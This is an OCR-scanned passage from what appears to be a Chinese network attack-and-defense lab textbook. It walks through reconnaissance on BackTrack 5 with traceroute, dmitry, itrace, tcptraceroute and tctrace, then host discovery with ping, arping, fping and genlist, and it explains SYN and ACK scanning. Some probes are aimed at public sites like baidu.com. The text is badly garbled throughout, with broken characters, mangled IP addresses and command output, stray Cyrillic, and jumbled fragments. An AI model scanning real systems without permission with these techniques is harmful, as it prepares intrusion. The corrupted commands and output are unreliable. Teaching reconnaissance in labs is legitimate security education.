在 掌握 TCP/IP 体系 结构 ,特别 是 掌握 网 络 层 路 由 协议 和 路 由 器 工作 原理 的 基础 上 , 通 
过 学 习 Linux 环境 下 相关 路 由 跟踪 工具 的 使 用 方法 ,掌握 路 由 的 信息 探测 ,信息 收集 与 分 析 
方法 ,尤其 是 通过 对 几 个 工具 (主要 有 traceroute .dmitry \itrace ,tcptraceroute \tctrace) 应 用 
功能 的 对 比分 析 , 可 以 发 现 不 同 工 具 的 应 用 优势 。 

2. 实验 条 件 

根据 具体 应 用 ,为 使 实验 与 实际 应 用 有 机 结合 ,本 实验 使 用 一 台 运 行 Back Track 5 
(BT5) 操 作 系统 的 计算 机 作为 实验 环境 进行 实验 。 
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5.1.3 实验 过 程 


步骤 1: 正确 登录 B 
“startx” 命 令 切 换 到 图 形 界面 。 

步骤 2: 选择 菜单 栏 上 的 Terminal 选项 ,打开 终端 操作 窗 

步骤 3: traceroute 工具 的 使 用 。 首 先 确定 网 络 中 存在 一 台 正在 运 行 的 被 追踪 的 目标 
主机 ,该 实验 中 假设 该 主机 的 IP 地 址 为 192. 168. 1. 185。 使 用 traceroute 工具 追踪 192. 
168. 1. 185 主机 ,如 果 追 踪 成 功 ,将 显示 如 图 5-1 所 示 的 结 





如 果 进 入 的 是 命令 行 模 式 , 为 方便 实验 进行 ,可 输入 























~# traçeroute 192.168.1.185 
traceroute to 132.168.1.185 (h32. 168.1 JB5)，3g_hops_a 县 ，56 byte-packtts 
@finué clouf. con. (e PD 185)! 1.797 K 11 73905 !X { 1766275 !X 





5-1 使 用 traceroute 工具 成 功 追踪 192. 168. 1. 185 主机 后 的 显示 结果 


如 果 使 用 traceroute 工具 追踪 www. baidu. com(61. 135. 169. 125 是 百度 的 IP 地 址 ,也 
可 以 直接 使 用 域名 www. baidu. com) ,追踪 成 功 后 将 显示 如 图 5-2 所 示 的 结果 。 


f^ ~ x root@bt: ~ ] 
File Edit View Terminal Help 


rootebt:~# traceroute 61.135.169.125 
traceroute to 61.135.169.125 (61.135.169.125), 30 hops max, 60 byte packets 
бодоп (192.168.1.253) 3.720 ms 3.589 ms —3-513-as, 
bogon (172.30.7.1) 92.899 ms 92.843 ms * 
113.31.45.193 (113.31.45.193) 16.285 ms 16.232_as”17.688Was 
бодоп (172.16.6.9) 12.857 ms 12.793 ms 14288 ms 
125.39.81.157 (125.39.81.157) 8.070 ms 8.489 ms 125.39.81.45 (125.39081.45| 
8.323 ms E 
202.99.66.101 (202.99.66.101) 9.735 ms 3.6% ms 9.564 iis 
219.158.12.133 (219.158.12.133) 14.261 ms 14.172 СИЕТ. 





124.65.194.14 (124.65.194.14) 11.145 ms 11.082 ms 15.888 ms 
61.148.155,226 (61.148.155.226) 12.166 ms 10.836 MOUM ja 
02.106.43 38 (222,105.49.30) 16.855, ns xu: * 

>) ' 











В 5-2 使 用 traceroute 工具 成 功 追踪 www. baidu. com 的 显示 结果 
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如 果 使 用 traceroute 工具 追踪 www. w3school. com, 由 于 该 主机 不 存在 (已 关机 ) ,因此 
将 显示 如 图 5-3 所 示 的 结果 。 实 验 时 ,读者 可 以 用 一 个 不 存在 的 主机 域名 来 代替 本 实验 中 


的 www. w3school. com。 





^ v x root@bt: /pentest/enumeration/Otrace 
File Edit View Terminal Help 


rootébt:/pentest/enumeration/Gtrace£ traceroute www.w3school.com 
traceroute to ww.w3school.com (108.175.169.201), 30 hops max, 69 byte packets 
bogon (192.168.1.253) 8.065 ms 7.965 ms 7-889-as. 


113.31.45.193 (113.31.45.193) 17.610 ms 17.535..#5—17.452\5, 
-16.6.9 (172.16.6.9) 17.360 ms 17.295 ms” 17.222 ms 
.39.81.45 (125.39.81.45) 8.877 ms 12.418 ms 12.292 #5 
.99.66.101 (202.99.66.181) 12.235 ms 292.99.116.141 (@02.99.116.141)% 1 
202.99.66.101 (202.99.66.101) 12.045 ms 
.158.100.5 (219.158.109.5) 11.974 ms 219.158.7.45 (21958249), 13.98. 
021 ms 





图 5-3 使 用 traceroute 工具 追踪 www. w3school. com 失败 后 的 显示 结果 





步骤 4; dmitry 工具 的 应 用 。 首 先 ,进入 /usr/local/bin 目录 ,找到 dmitry 工具 ; 然后 
使 用 “. /dmitry” 命 令 查看 其 帮助 文档 ; 输入 “. /dmitry -p 192. 168. 1. 185 -p -bMS AME 
机 192. 168. 1. 185 ,操作 过 程 和 显示 结果 如 图 5-4 所 示 , 读 者 会 发 现 该 主机 开放 了 SSH 的 
22 端口 








^ v x Iroot@bt: /usr/local/bin 
File Edit View Terminal Help 


root@bt:/usr/local/bin# ./dmitry -p 192.168.1.185 -p -b 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


HostIP:192.168.1.185 
HostName:linux.cloud.com 


Gathered TCP Port information for 192.168.1.185 


< E 


Portscan Finished: Scanned 150 x 148 ports were in state ‘ldséd 


All scans completed, exiting 
/usr/local/bin# 
/usr/local/bin# 
/usr/local/bin# 
/usr/local/bin# 





В 5-4 使 用 dmitry 工具 扫描 主机 192. 168. 1. 185 的 显示 结果 


如 果 扫 描 www. baidu. com 开放 的 TCP 80 端口 ,将 会 显示 如 图 5-5 所 示 的 结果 。 
步骤 5: itrace 工具 的 应 用 。itrace 工具 有 traceroute 的 功能 ,不 同 之 处 在 于 itrace 使 用 





$53 Web 服务 器 攻防 实 训 159 





A vx root@bt: /usr/local/bin 
File Edit View Terminal Help 


@bt:/usr/local/bin# ./dmitry -p ww.baidu.com -p -b 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


HostIP:61.135.169.105 
HostName : www. baidu. сот 


Gathered TCP Port information for 61.135.169.105 


All scans completed, exiting 
root@bt:/usr/local/bin# 





图 5-5 扫描 www. baidu. com 开放 的 TCP 80 端口 后 的 显示 结果 





ICMP 反射 请 求 。 如 果 防 火 墙 禁止 了 traceroute, 但 允许 ICMP 的 反射 请 求 ,那么 仍然 可 以 
使 用 itrace 来 追踪 防火 墙 内 部 的 路 由 。 
执行 “. /itrace -i eth0 -d www. baidu. com ”命令 , 可 以 看 到 如 图 5-6 所 示 的 回复 信息 


进行 了 成 功 追 踪 。 














m 
^ v X root@bt: /pentest/enumeration/irpas 
File Edit View Terminal Help 
rootébt:/pentest/enumeration/irpas£ ./itrace -i eth8 -d www.baidu.com 
1) [192.168.1.253] 
2(а11) Timeout 
3(all) Timeout 
4(1) [113.31.45.193] 

5(1) [172.16.6.9] 

6(1) [125.39.81.157] 

7(1) [202.99.116.9] 

8(1) [219.158.12.133] 

9(1) [124.65.194.14] 

10(1) [61.148.155.226] 

11(1) [202.106.43.30] 

12(all) Timeout 

13(all) Timeo, < p 

^ UMP USE Wi Ne M гери) 

rootiibt : /pentest/enümeration /ilpas 

rootébt : /pentest/enumeration/irpass 
/pentest/enumeration/irpass 
/pentest/enumeration/irpas& 
/pentest/enumeration/irpas& 
/pentest/enumeration/irpass 
/pentest/enumeration/irpas# 

@bt:/pentest/enumeration/irpas# 
root@bt:/pentest/enumeration/irpas# | 








5-6 ”使 用 . /itrace 工具 成 功 追踪 到 www. baidu. com 后 的 显示 信息 








需要 说 明 的 是 ,百度 www. baidu. com 主机 前 面 肯定 是 存在 防火 墙 等 安全 设备 的 。 这 
时 ,如 果 青 使 用 traceroute 工具 追踪 ,将 会 得 到 如 图 5-7 所 示 的 结果 ,显示 无 法 正常 追踪 , 充 
分 说 明了 itrace 工具 的 应 用 优势 。 

步骤 6: tcptraceroute 工具 的 应 用 。tcptraceroute 工具 可 以 作为 一 个 传统 的 traceroute 
的 补充 工具 ,通过 向 目标 主机 发 送 TCP SYN 数据 包 来 追踪 路 由 。 如 果 防 火 墙 禁止 了 
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^ v X root@bt /pentest/enumeration/irpas 
File Edit View Terminal Help 


rootébt:/pentest/enumeration/irpas£ traceroute www.baidu.com 
traceroute to www.baidu.com (61.135.169.125), 39 hops max, 60 byte packets 
1 bogon (192.168.1.253) 3.463 ms 3.365 ms—3-298-as. 

bogon (172.30.7.1) 11.152 ms 11.081 ms 12.655 ms 


113.31.45.193 (113.31.45.193) 15.273 ms 16.7455 —15.115\аѕ 
bogon (172.16.6.9) 12.064 ms 11.996 ms 11<924 ms 
125.39.81.157 (125.39.81.157) 7.558 ms 7.790 ms 7.695 #5 
202.99.66.161 (202.99.66.101) 7.616 ms 42.277 ms 42.19 ms 
219.158.12.133 (219.158.12.133) 42.137 ms 42.049 ms 414879 ms 
124.65.194.14 (124.65.194.14) 41.908 ms 41.849 ms 41.7529, 


61.148.155.226 (61.148.155.226) 41.653 ms 41.582 ms 41.490 ms 





В 5-7 使 用 traceroute 工具 无 法 追踪 到 www. baidu. сот 主机 的 信息 





traceroute, 但 仍然 允许 特定 ТСР 端口 的 通信 ,那么 teptraceroute 同样 可 以 追踪 到 路 由 。 


打开 /usr/local/bin ,找到 tcptraceroute 工具 并 执行 ,可 以 看 到 成 功 追 踪 后 的 显示 信息 ， 
如 图 5-8 Brzs o 


^ v X root@bt: /usr/local/bin 

File Edit View Terminal Help 

root@bt:/usr/local/bin# ./tcptraceroute www.w3schoo.com 

Selected device ethe, address 192.168.1.190, port 42453 for outgoing packets 
the path to www.w3schoo.com (141.8.224.166)-om-ICP port 89 (www), 38 hop 


.168.1.253 8.262 ms 3.751 ms 12.162-в5 
.7.1 7.016 ms 50.172 ms 16.355 ms 


.45.193 7.385 ms 12.938 ms 7.935 ms 
.6.9 9.525 ms 10.273 ms 9.192 ms 
.81.45 7.877 тз 3.703 ms 8.119 ms 
.66.101 7.601 ms 16.535 ms 10.811 ms 
.158.20.21 12.063 ms 24.607 ms 26.766 ns 
.158.97 186 11.567 ma 26.632 ms 12.243 ms 
.158.970182 14.630,08 22.388 ngl. ll 954 ns 
¿9 CNET DAD 256.815 & 256.258 @5 | 
'Sjo-Db1 - Lipi teli net. 213; Ce 34136581ез ЇР 350.929. ms) 
las-bbl-link. telia.net (213.155 135.186) 270.548 ms 2717847" /358.351 ms| 
dls-bbl-link. telia.net (213.155.134.125) 316.753 ms 326.438 f$ 308.966 ms 
giganews-ic-388068-dls-bbl.c.telia.net (62.115.11.166) 418.333 ms 419.534 
417.000 ms 
209-99-48-54.fwd.datafoundry.com (209.99.48.54) 415.588 ms * 416.409 ms 
141.8.224.106 [open] 421.723 ms 428.975 ms 422.122 ms 
root@bt:/usr/local/bin# 











5-8 成功 追 踪 www. w3schoo. com 主机 后 的 显示 信息 


如 果 使 用 traceroute 追踪 ,将 会 显示 如 图 5-9 所 示 的 结果 ,说 明 追 踪 失 败 。 

步骤 7: tetrace 工具 的 应 用 。tctrace 工具 与 itrace 类 似 ,但 tctrace 使 用 TCP SYN Ж 
据 包 代替 了 ICMP 反射 包 来 工作 。 切 换 到 tctrace 所 在 的 目录 ,并 运行 “. /tctrace -i eth0 -d 
www. w3schoo. com” 命 令 ,将 会 显示 如 果 5-10 所 示 的 结果 ,说 明 已 经 追踪 成 功 。 
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a v x root@bt /usr/local/bin 


File Edit View Terminal Help 

root@bt:/usr/local/bin# traceroute www.w3schoo.com 
traceroute to ww.w3schoo.com (141.8.224.106), 30 hops max, 60 byte packe| 
1 bogon (192.168.1.253) 3.861 ms 3.774 ms—3-679-as. 


2... 
3 +++ 

4 113.31.45.193 (113.31.45.193) 17.665 ms 19.181..5—17.503\5 
5 bogon (172.16.6.9) 12.451 ms 12.386 ms 12<264 ms 

6 125.39.81.45 (125.39.81.45) 7.892 ms 7.805 ms 7.679 msi 

7 

Ө! 

8 


202.99.66.101 (202.99.66.101) 7.625 ms 202.99.116.141 (282.99.116.14 


6 ms 202.99.66.101 (202.99.66.101) 7.400 ms 


219.158.20.21 (219.158.20.21) 21.413 ms 219.158.101.197 (239,158.101 


21.348 ms 219.158.26.21 (219.158.26.21) 21.238 ms 


9 219.158.97,186 (219.158.97.186)ş 10.446 ms 21.104 ms 219.]587T793 54 
| 


B.101.54) 91.842 ms 


21958.9718) EIN 41211 13 682 5, 67 BE 219.258.160174 


47% 91.255 


219.158.27.70 (219.158.27.70){ 267.849 ms 219.158.27.74 2197158.27| 


55.551 ms 


las-bbl-link. telia.net (213.155.135.186) 322.835 ms .748 ms 


dls-bbl-link. telia.net (213.155.134.125) 350.217 ms * 





^ v X root@bt: /pentest/enumeration/irpas 
File Edit view Terminal Help 
rootébt:/pentest/enumeration/irpas& ./tctrace -i eth -d www.w3schoo.com 

[192.168.1.253] 

[172.30.7.1] 

Timeout 

[113.31.45.193] 

[172.16.6.9] 

[125.39.81.45] 

[202.99.66.101] 

[219.158.20.21] 

[219.158.97.186] 

[219.158.97.182] 

[219.158.27.74] 

[213.248.71.89] 

[213. ECT] 

POE AT 

162.115,21. 166] 

[209.99.48.54] 

[141.8.224.106] (reached; open) 
root@bt:/pentest/enumeration/irpas# 








图 5-10 使 用 tctrace 工具 成 功 追踪 www. w3schoo. com 主机 后 的 显示 信息 


5.1.4 任务 与 思考 


ЖЧ ЖЗ. Я 
防 要 求 ,还 需要 进一步 对 路 由 器 的 相关 功能 


下 的 攻 
ЛА 
a 


合适 的 





H 














者 已 经 





) 在 不 同 的 网 络 间接 收 分 组 ,然后 根据 分 组 中 的 “目的 IP” 地 址 来 查询 路 由 表 ,再 通过 
楼 口 将 分 组 转发 出 去 。 


掌握 了 路 由 信息 的 获得 方式 ,但 为 了 能 够 适应 复杂 网 络 环境 
翰 行 学 习 。 路 由 器 的 主要 功能 包括 以 下 





(2) 选择 最 合理 的 路 由 ,引导 通信 。 为 了 实现 这 一 功能 ,路 由 器 要 按照 某 种 路 由 通信 协 


议 ( 典 型 协议 有 RIP、OSPF、BGP 等 ) 查 找 路 由 表 。 网 络 中 的 每 个 路 由 器 按照 这 
地 更 新 它 所 保存 的 路 由 表 ,以 便 维护 有 效 的 路 
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(3) 路 由 器 在 转发 分 组 的 过 程 中 ,为 了 便于 在 网 络 间 传送 分 组 ,需要 按照 预定 的 规则 把 
大 的 数据 包 ( 应 用 层 的 报 文 ) 分 解 成 适合 在 不 同 网 络 之 间 自 由 传输 的 小 的 数据 包 , 到 达 目 的 
地 后 再 把 分 解 的 数据 包 重 组 成 原 有 形式 (应 用 层 的 报 文 ) 。 

(4) 多 协议 的 路 由 器 可 以 连接 使 用 不 同 通信 协议 的 网 络 段 ,作为 不 同 通信 协议 网 络 段 
通信 连接 的 平台 。 

(5) 路 由 器 的 主要 任务 是 把 通信 引导 到 目的 地 网 络 ( 局 域 网) ,然后 根据 分 组 中 的 “目的 
IP” 地 址 转发 给 指定 的 主机 。 后 一 个 功能 是 通过 ARP(Address Resolution Protocol, 网 络 地 
址 解析 协议 ) 完 成 的 。 

(6) 动态 限 速 。 动 态 限 速 路 由 器 能 够 实时 地 计算 每 位 用 户 所 需要 的 带宽 ,精确 分 析 用 
户 上 网 类 型 ,并 合理 分 配 带宽 。 

(7) 缺乏 源 地 址 认证 。 路 由 器 接收 到 一 个 分 组 时 ,正常 情况 下 只 会 查看 其 “目的 1P” 地 
址 ,将 以 “目的 IP” 地 址 为 查询 路 由 表 并 转发 分 组 ,但 不 会 对 “ 源 IP” 地 址 进行 认证 。 也 就 是 
说 ,路 由 器 对 于 接收 到 的 分 组 ,只 考虑 到 哪里 去 ,而 不 考虑 从 哪里 来 。 这 一 机 制 为 网 络 安全 
带 来 了 问题 ,许多 针对 网 络 的 攻击 都 是 利用 了 这 一 机 制 , 通 过 设置 虚假 的 “ 源 IP” Hb h: ЖИК 
骗 目 的 主机 ,再 利用 一 些 协议 的 工作 机 制 (如 TCP 的 三 次 握手 ) 来 进行 攻击 。 


5.2 主机 扫描 : 主机 探测 


5.2.1 预备 知识 : 主机 扫描 方法 


主机 扫描 (Host Scan) 是 指 通过 对 目标 网 络 ( 一 般 为 一 个 或 多 个 ТР 网 段 ) 中 主机 IP 地 
址 的 扫描 ,以 确定 目标 网 络 中 有 哪些 主机 处 于 运行 状态 。 主 机 扫描 的 实现 ,一 般 是 借助 于 
ICMP, TCP, UDP 等 协议 的 工作 机 制 , 来 探测 并 确定 某 一 主机 当前 的 运行 状态 和 可 被 利用 
的 资源 (如 打开 的 进程 .开放 的 端口 等 ) 。 

1. 基于 ICMP 协议 的 扫描 方法 

ICMP(Internet Control Message Protocol, Internet 控制 报 文 协议 ) 是 TCP/IP 协议 栈 
的 网 际 层 提供 的 一 个 为 主机 或 路 由 器 报告 差错 或 异常 情况 的 协议 。PING(Packet Internet 
Groper, 分 组 网 间 探 测 ) 是 ICMP 的 一 个 重要 的 应 用 功能 , 它 是 应 用 层 直接 调用 网 际 
ICMP 协议 的 一 个 特殊 应 用 ,通过 使 用 ICMP 回 送 请 求 与 回 送 应 答 报 文 来 探测 两 台 主 机 之 
间 网 络 的 连通 性 。 

2. 基于 TCP 协议 的 主机 扫描 方法 

TCP( Transmission Control Protocol ,传输 控制 协议 ) 是 一 种 面向 连接 的 .可 靠 的 .基于 
字 节 流 的 传输 层 通信 协议 。 任 意 两 个 节点 间 每 一 个 TCP 通信 的 建立 ,都 需要 有 连接 建立 、 
数据 传输 和 连接 释放 这 3 个 过 程 ( 即 TCP 三 次 握手 ) ,其 目的 是 让 通信 的 双方 都 知道 彼此 的 
存在 ,并 通过 双方 协商 来 确定 具体 的 通信 参数 (如 缓存 大 小 、 连 接 表 中 的 项 目 、 最 大 窗口 
值 等 ) 。 

3. 基于 UDP 协议 的 主机 扫描 方法 

UDP(CUser Datagram Protocol ,用 户 数据 报 协议 ) 是 一 个 无 连接 (没有 提供 三 次 握手 过 








ш 
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程 ) 的 、 尽 最 大 努力 交付 (不 可 靠 ) 的 、 面 向 报 文 (保留 了 报 文 的 边界 ) 的 传输 层 通 信 协 议 。 与 
TCP 相 比 ,UDP 最 大 的 优点 是 占用 资源 少 、 效 率 高 ,最 大 的 缺点 是 不 可 靠 。 


5.2.2 实验 目的 和 条 件 


1. 实验 目的 

主机 探测 是 整个 主机 扫描 过 程 的 重要 组 成 部 分 。 通 过 主机 探测 ,可 以 在 确定 的 范围 (一 
般 为 一 个 或 多 个 IP 地 址 段 ) 发 现 正 在 运行 (存活 ) 的 主机 ,为 下 一 步 攻击 (端口 扫描 和 操作 系 
统 类 型 确定 ) 黄 定 基础 。 在 网 络 攻击 过 程 中 ,每 一 个 实现 步骤 之 间 都 是 相互 关联 和 相互 影响 
的 ,前 一 个 环节 的 操作 成 果 是 后 一 个 环节 的 基础 。 主 机 探测 的 主要 目的 是 确定 被 攻击 对 象 ， 
只 要 对 象 的 确定 是 准确 无 误 的 ,那么 后 续 的 工作 开展 才 会 有 价值 和 意义 。 

通过 本 实验 ,读者 需要 掌握 BTS 环境 下 ping arping,fping 和 genlist 工具 的 使 用 方法 ， 
以 及 不 同 工 具 的 应 用 特点 和 功能 区 别 。 

2. 实验 条 件 

本 实验 需要 在 网 络 环境 中 进行 。 建 议 实验 在 一 个 局 域 网 内 部 进行 ,这 样 可 以 通过 实验 
发 现 本 局 域 网 中 有 哪些 主机 处 于 运行 状态 。 例 如 ,一 个 局 域 网 中 有 50 台 主 机 ,为 了 实验 ,可 
以 让 其 中 的 10 台 ( 随 意 确定 ) 运 行 , 其 他 主机 处 于 关闭 状态 。 通 过 本 实验 ,将 实验 结果 与 实 
际 情况 进行 对 比分 析 , 以 验证 实验 结果 的 正确 性 和 可 信 性 。 

本 实验 中 使 用 的 攻击 主机 仍然 是 运行 BT(BackTrack)5 系统 的 计算 机 。 


5.2.3 实验 过 程 


步 又 1: 正确 登录 BT5 系统 。 如 果 进 入 的 是 命令 行 模式 ,为 方便 实验 进行 ,可 输入 
“startx” 命 令 切 换 到 图 形 界面 。 

步骤 2: 选择 菜单 栏 上 的 Terminal 选项 ,打开 终端 操作 窗口 。 

步骤 3: ping 工具 的 应 用 。ping 是 非常 著名 的 用 来 检查 主机 是 否 在 线 的 工具 , 它 的 工 
作 原 理 基于 发 送 ICMP ECHO Request 包 到 目标 主机 ,如 果 目 标 主机 在 线 并 且 不 对 ping 请 
求 数据 包 进 行 阻 止 时 ,将 回复 一 个 ICMP ECHO Reply 数据 包 。“ping” 命 令 的 选项 较 多 ,最 
常用 的 有 以 下 几 个 。 

-c count; ECHO Request 包 发 送 数 量 。 

-i interface address; 源 地 址 网 络 接口 ,该 参数 可 以 是 IP 地 址 或 网 卡 名 称 。 

-s packet size: 指定 要 发 送 的 数据 字 节 数 ,默认 值 是 56 ,然后 再 与 8 字 节 的 ICMP 头 数 
据 组 成 64 字 节 的 ICMP 数据 包 。 

在 实验 中 ,如 果 要 检查 目标 IP 地 址 192. 168. 1. 108( 该 IP 地 址 为 被 攻击 对 象 的 IP 地 
址 ) , 且 发 送 两 个 大 小 为 1000 字 节 的 包 , 其 命令 为 “ 井 ping -c 2 -s 1000 192. 168. 1. 108”, 如 
图 5-11 所 示 。 

步骤 4: arping 工具 的 应 用 。arping 是 一 个 在 局 域 网 中 利用 ARP(Address Resolution 
Protorcol ,地 址 解析 协议 ) 来 探测 目标 主机 连通 性 的 工具 , 它 在 测试 特定 IP 地 址 在 网 络 中 是 
否 使 用 时 非常 有 用 。 该 命令 只 能 运行 在 本 地 局 域 网 内 ,无 法 跨越 路 由 器 和 网 关 。 在 ВТУ 的 
终端 窗口 中 ,可 以 输入 “arping” 命 令 , 按 Enter 键 ,获取 到 该 命令 的 所 有 选项 及 其 使 用 方法 


164 网 


络 攻击 与 防御 实 训 





^ v 


х root@bt: ~ 
File Edit View Terminal Help 


root@bt:~# ping -c 2 


PING 192.168.1.108 (192.168. 
1808 bytes from 192.168.1.18 
1008 bytes from 192.168.1.16: 


rtt яїп/гуп/нах/шйеч = 0.308/0. 


图 5-11 ping -c 2 -s 


介绍 。 常 用 的 选项 为 apring -c。 例 如 
程 和 结果 如 图 5-12 所 示 ( 可 与 图 5-11 





x root@bt ~ 
File Edit View Terminal Help 
rootebt :~# arping 





-5 1000 192.168.1.108 
.198) 1090(1028) bytes of data. 


icmp_seq=1 ttl=64-time=8.313 ms 
icmp seq=2 ttl=64 time=0.308"Ws 


- 192.168.1.198 ping statistics --- 
2 packets transmitted, 2 received, 


packet loss; time 999ms 


410/0.513/0.184 ms 


1000 192. 168. 1. 108 的 运行 过 程 和 结果 


108” 命 令 ， 


,输入 “ 5 192. 168. 1. 
中 ping 命令 的 运行 过 程 和 结果 进行 对 比 ) 。 


# arping -c 


ARPing 2.09, by Thomas Habets <thomas@habets.pp.se> 


usage: arping [ 
[ -T <host/ip ] [ 
[ -i <interface> 


For complete usage info, use 
# 


al:7b (192. 
al:7b (192. 


60 bytes 
60 bytes 


Эзе; 68.1 fog Garis tics 


5 packets transmitted, 5 packets re 


rootëbt:-# P 


-GaAbdDeFpqrRuv ] [ 





w «us» ]-[—5-«host/ip» ] 
5 «MAC» ] [ -t «MAC» ] [ -C%eçount> ] 
] «host/ip/MAC-—B* 


help or check the manpag&- 


168.1.108): 
168.1.108): 
.168.1.108): 
.168.1.108) 
21681 198) 


11те 10.000 
11те=161999, 
time=132.000 
time=}267000 
]ime-139-008 


чзес 
usec 
usec 
useç 
бѕес 


了 8% unanswered (8 'extrá) 





图 5-12 





步骤 5: fping 工具 的 应 用 。 


arping -c 5 192. 168. 1. 108 的 运行 


fping 工 


过 程 和 结果 





4 可 以 同时 向 多 个 目标 主机 (主机 列表 ) 发 送 


Ж ping 


(ICMP ECHO) 请 求 包 。 主 机 列表 可 以 在 命令 行 中 指定 也 可 以 通过 包含 目标 主机 的 文件 指 
定 。 M 通过 监视 目标 主机 的 回复 来 判断 主机 是 否 可 用 。 如 果 目 标 主 机 返回 


WAS ,其 信息 将 会 从 目标 i 
次 数 ) ,该 EUH 会 被 标记 为 不 可 达 。 
ECHO 数据 包 。 














默认 情况 下 ,fping 将 尝试 向 每 个 目标 发 


录 清 单 中 删除 ; 如 果 主 机 在 тыны 
3 个 ICMP 
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要 运行 fping, 可 从 Application 菜单 中 选择 BackTrack —> InformationGathering > 
Network Analysis—Identify Live Hosts—Fping 选项 打开 ,打开 后 会 先 出 现 该 命令 的 帮助 
文档 ,如 图 5-13 所 示 。 





File Edit View Terminal Help 
pecified) 
-9 generate target list (only if no -f specified) 
(specify the start and end IP-in-the-target list, о ipply a IP| 
netmask) 


(ex. fping -g 192.168.1.8 192-3168-T-755 or [ping -g 192.168.1.8/| 


interval between sending ping packefs (in millisgé] (default. 25) 
loop sending pings forever 
ping multiple interfaces on target host 
show targets by name (-d is equivalent) 
interval between ping packets to one target (in Wisec) 
(in looping and counténg modes, default 1000) 
guiet (don't show perztarget/per-ping results) 
Bame as.-q,.buE show Summdby гуегу п secdhds, 
LIT Sm ЖЧ ЖЕР ЕЛЕ 3) 
Paint tiñalustats 
set source address | 
individual target initial timeout (in millisec) (défdUlt 500) 
set select timeout (default 19) 
show targets that are unreachable 
show version 
list of targets to check (if no -f specified) 











В 5-13 “fping” 命 令 的 帮助 文档 





[ping 可 以 识别 多 个 主机 ,如 通过 “fping 192. 168. 1. 108 192. 168. 1. 109”( 不 同 的 IP 地 
址 之 间 用 一 个 空格 隔 开 ) 命 令 , 可 以 查看 当前 这 两 台 主 机 是 否 处 于 运行 状态 ,运行 过 程 和 结 
果 如 图 5-14 所 示 。 





File Edit View Terminal Help 
TUN 
bt :~ 





5-14 ”使 用 “fping 192. 168. 1. 108 192. 168. 1. 109” 命 令 同 时 查看 两 台 主 机 是 否 在 线 


另外 ,如 果 需 要 查看 多 D E E -s” 加 一 个 或 多 个 域名 
(或 PP 地址 ) 命 令 , 如 图 5 < 

步骤 6: genlist ihid genlist 工具 用 于 生成 一 个 对 ping 探测 做 出 回应 的 主机 列 

т. 要 启用 该 命令 ,可 以 进入 /usr/local/bin/genlist 目录 ,直接 执行 “genlist” 命 令 , 会 显示 
该 命令 的 帮助 文档 ,如 图 5-16 所 示 。 
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x root@bt: ~ 
File Edit View Terminal Help 


В 5-15 使 用 “fping” 命 令 同时 查看 多 个 目标 主机 


x root@bt: ~ 
File Edit View Terminal Help 
tëbt:-# /usr/local/bin, 
nlist [Input Тур 
Input Type 
s --scan <target> 
scan options 
n --nmap <pat 
--inter <interface> 


[c al Options] 


Ping Target Range ex: 10.0.0 


h to Nmap abtE 


using поп default inter 











A 5-16 


“genlist "命令 的 帮助 文档 信息 


例如 ,如 果 要 显示 192. 168. 1. 0/24 网 段 中 的 可 用 主机 ,可 以 使 用 */usr/local/bin/ 
genlist -s 192. 168. 1. V х ”命令 来 进行 ,如 图 5-17 所 示 。 


5.2.4 任务 与 思考 


通过 本 实验 的 练习 ,读者 还 需要 继续 


з 








Server( 








:于 TCP 协议 的 主机 扫描 方法 。 

F TCP 协议 的 主机 扫描 方法 的 关键 是 TCP 协议 的 三 次 握手 过 程 。 其 中 ,ACK 表示 
民 务 器 ) 对 Client( 客 户 端 ) 请 求 建立 的 确认 ,但 是 ,如 果 Client 
请 求 (第 一 次 握手 ) ,而 是 直接 进行 确认 (第 三 次 握手 ) ,Server 就 会 认为 出 现 了 


根本 没有 进行 SYN 
-个 重要 的 错 
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al/bin/genlist -s 192.168.1.\* 





图 5-17 使 用 genlist 工具 同时 显示 192. 168. 1. 0/24 网 段 中 的 可 用 主机 


误 ,向 Client 发 送 一 个 头 部 “复位 ”(RST) 字 段 为 1 的 报 文 ,告诉 Client 必须 释放 本 次 连接 ， 
再 重新 建立 TCP 连接 。 根 据 该 工作 机 制 ,如 果 攻 击 者 向 目标 主机 发 送 一 个 只 有 ACK 的 报 
文 , 当 接收 到 目标 主机 一 个 RST 反馈 报 文 时 ,就 可 以 确认 目标 主机 的 存在 。 

另 一 种 是 利用 ТСР 协议 三 次 握手 过 程 针对 主机 的 SYN 扫描 。 如 果 目 标 主 机 处 于 运行 
状态 ,但 主机 上 的 服务 器 进程 没有 打开 , 则 目标 主机 将 返回 一 个 RST 报 文 ; 如 果 目 标 主机 
上 的 服务 器 进程 处 于 “监听 ”(listen) 状 态 , 则 会 返回 一 个 第 二 次 握手 的 ACK/SYN 报 文 。 

不 管 返回 哪 一 种 报 文 , 都 可 以 从 中 判断 目标 主机 的 当前 状态 。 

以 上 探测 方法 ,需要 读者 在 继续 深入 学 习 TCP 及 相关 协议 工作 原理 的 基础 上 , 青 借助 

相关 的 工具 软件 ,通过 具体 的 实验 来 学 习 和 掌握 。 






5.3 端口 扫描 : Zenmap 工具 的 应 用 


5.3.1 预备 知识 : 端口 扫描 


端口 扫描 (Port Scan) 是 对 正 处 于 运行 状态 的 主机 使 用 的 TCP/UDP 端口 进行 探测 的 
技术 。 端 口 是 用 于 标识 计算 机 应 用 层 中 的 各 个 进程 在 与 传输 层 交 互 时 的 层 间 接口 地 址 ,两 
台 计 算 机 间 的 进程 在 通信 时 ,不 仅仅 要 知道 对 方 的 IP 地址 ,还 要 知道 对 方 的 端口 号 。 为 此 ， 
可 以 将 端口 理解 为 进入 计算 机 应 用 进程 的 窗口 ,在 TCP 和 UDP 协议 中 端口 用 16b 字段 表 
示 , 其 值 为 0 一 65 535。 传 输 层 的 端口 分 为 服务 器 端 使 用 的 端口 号 和 客户 端 使 用 的 端口 号 两 
大 类 。 其 中 ,服务 器 端 使 用 的 端口 号 又 分 为 两 类 : 一 类 称 为 熟知 端口 号 (Well Known 
Ports) 或 系统 端口 号 ,其 值 为 0 一 1023 ,可 以 在 http://www. iana. org 网 站 上 查 到 ; 另 一 类 
称 为 登记 端口 号 ,其 值 为 1024 一 49 151. 使 用 这 类 端口 时 需要 在 ТАМА (the Internet 
Assigned Numbers Authority, 互 联网 数字 分 配 机 构 ) 上 进行 登录 。 客 户 端 使 用 的 端口 号 称 
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为 短暂 端口 号 ,其 值 为 49152 一 65535, 仅 在 客户 进程 运行 时 临时 使 用 ,通信 结束 后 收回 。 

由 于 TCP 协议 和 UDP 协议 可 以 使 用 相同 的 端口 号 (如 DNS 同时 使 用 了 TCP 53 和 
